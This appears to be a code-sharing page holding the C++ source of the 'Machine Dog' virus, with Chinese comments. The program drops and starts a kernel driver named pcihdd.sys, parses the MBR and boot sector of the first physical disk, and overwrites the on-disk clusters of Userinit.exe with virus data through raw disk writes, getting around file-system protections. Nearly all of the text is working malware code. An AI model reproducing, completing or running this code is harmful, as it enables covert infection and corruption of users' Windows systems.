?? 機(jī)器狗原代碼.txt
字號:
// Test.cpp : 定義控制臺應(yīng)用程序的入口點(diǎn)。
//
#include "stdafx.h"
//==============================================================================
#include <pshpack1.h>
typedef struct _PARTITION_ENTRY
{
UCHAR active; // 能否啟動標(biāo)志
UCHAR StartHead; // 該分區(qū)起始磁頭號
UCHAR StartSector; // 起始柱面號高2位:6位起始扇區(qū)號
UCHAR StartCylinder; // 起始柱面號低8位
UCHAR PartitionType; // 分區(qū)類型
UCHAR EndHead; // 該分區(qū)終止磁頭號
UCHAR EndSector; // 終止柱面號高2位:6位終止扇區(qū)號
UCHAR EndCylinder; // 終止柱面號低8位
ULONG StartLBA; // 起始扇區(qū)號
ULONG TotalSector; // 分區(qū)尺寸(總扇區(qū)數(shù))
} PARTITION_ENTRY, *PPARTITION_ENTRY;
//==============================================================================
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
//==============================================================================
typedef struct _BBR_SECTOR
{
USHORT JmpCode; // 2字節(jié)跳轉(zhuǎn)指令,跳轉(zhuǎn)到引導(dǎo)代碼
UCHAR NopCode; // 1字節(jié)nop指令,填充用,保證跳轉(zhuǎn)指令長3個字節(jié)
UCHAR OEMName[8]; // 8字節(jié)的OEMName
// 下面開始為: BPB( BIOS Parameter Block )
USHORT BytesPerSector; // 每個扇區(qū)的字節(jié)數(shù) (512 1024 2048 4096)
UCHAR SectorsPerCluster; // 每個簇的扇區(qū)數(shù) ( 1 2 4 8 16 32 64 128 )兩者相乘不能超過32K(簇最大大小)
USHORT ReservedSectors; // 從卷的第一個扇區(qū)開始的保留扇區(qū)數(shù)目,該值不能為0,對于FAT12/FAT16,該值通常為1,對于FAT32,典型值為32
UCHAR NumberOfFATs; // 卷上FAT數(shù)據(jù)結(jié)構(gòu)的數(shù)目,該值通常應(yīng)為2,[NTFS不使用NumberOfFATs字段,必須為0]
USHORT RootEntries; // 對于FAT12/FAT16,該值表示32字節(jié)目錄項(xiàng)的數(shù)目,對于FAT32,該值必須為0;[NTFS不使用]
USHORT NumberOfSectors16; // 該卷上的扇區(qū)總數(shù),該字段可以為0,如果該字段為0,則NumberOfSectors32不能為0;對于FAT32,該字段必須為0 [FAT32/NTFS不使用該字段]
UCHAR MediaDescriptor; // 介質(zhì)類型
USHORT SectorsPerFAT16; // 該字段標(biāo)識一個FAT結(jié)構(gòu)占有的扇區(qū)數(shù)(FAT12/FAT16),對于FAT32卷,該字段必須為0;[FAT32/NTFS不使用該字段]
USHORT SectorsPerTrack; // 用于INT 0x13中斷的每個磁道的扇區(qū)數(shù)
USHORT HeadsPerCylinder; // 用于INT 0x13中斷的每個柱面的磁頭數(shù)
ULONG HiddenSectors; // 包含該FAT卷的分區(qū)之前的隱藏扇區(qū)數(shù)
ULONG NumberOfSectors32; // 該字段包含該卷上的所有扇區(qū)數(shù)目,對于FAT32,該字段不為0;FAT12/FAT16可根據(jù)實(shí)際大小是否超過65536個扇區(qū)數(shù)決定是否采用該字段; [NTFS不使用該字段]
// 下面開始為: EBPB ( Extended BIOS Parameter Block )
ULONG SectorsPerFAT32; // 對于FAT32,該字段包含一個FAT的大小,而SectorsPerFAT16字段必須為0;
} BBR_SECTOR, *PBBR_SECTOR;
#include <poppack.h>
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
//==============================================================================
#define STR_SYSFILE_PATH TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME TEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)
//==============================================================================
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
return errCode;
}
//==============================================================================
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}
//==============================================================================
// 感染硬盤第一個分區(qū)的指定的文件
//
// 1)通過FSCTL_GET_RETRIEVAL_POINTERS獲取文件數(shù)據(jù)的分布 信息
//
// 2)通過直接訪問硬盤(\\\\.\\PhysicalHardDisk0)的的MDR和第一個分區(qū)的引導(dǎo)扇區(qū)得到分區(qū)參數(shù)來定位文件。
//
// 3)通過對比ReadFile讀取的文件數(shù)據(jù)和自己定位后直接 讀取所得到的文件數(shù)據(jù),確定定位是否正確
//
// 入口參數(shù):
// 要感染的文件名(完整路徑)
//
// Return value:
// Success -> NULL
// Failed -> 指向出錯信息的指針
//==============================================================================
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512];
UCHAR diskBuf[512];
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
//
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn;
if(!dwVcnExtents)
{
errCode = (ULONG)(-3); // 文件太小, 不能操作
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4); // 該文件是壓縮文件, 不能操作
goto FunExit02;
}
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// 打開第一個物理硬盤
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
// 讀取硬盤第一個扇區(qū)(MBR)
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0x80)
{
errCode = (ULONG)(-1); // 分區(qū)不是啟動分區(qū)
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2); // 不支持的磁盤分區(qū)
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512;
// 讀取啟動分區(qū)的第一個扇區(qū)(啟動扇區(qū))
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;
// 根據(jù)FAT32/NTFS計(jì)算Userinit的起始簇的偏移量
diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;
// 檢查文件尋址
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5); // 尋址文件不成功
goto FunExit03;
}
// 分配緩沖
dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // 保存一個簇所要的緩沖
if(!lpClusterBuf)
{
errCode = GetLastError(); // 尋址文件不成功
goto FunExit03;
}
// 把Virus文件的數(shù)據(jù)從SYS文件資源段中解碼出來
if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0x00401000, // 本執(zhí)行文件代碼段的開始, 在C語言中我不會表達(dá)
0x73E, // 本執(zhí)行文件代碼段的長度, 在C語言中我不會表達(dá)
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}
// 寫Virus文件的數(shù)據(jù)到磁盤
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}
//==============================================================================
int _tmain(int argc, _TCHAR* argv[])
{
TCHAR filePath[MAX_PATH];
DWORD errCode;
if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL))))
{
MessageBox(NULL, TEXT("驅(qū)動程序的加載沒有成功,程序?qū)o法運(yùn)行"), NULL, MB_ICONERROR);
goto FunExit00;
}
ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
WriteVirusToDisk(filePath);
StopAndDeleteDriver();
FunExit00:
return 0;
}
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -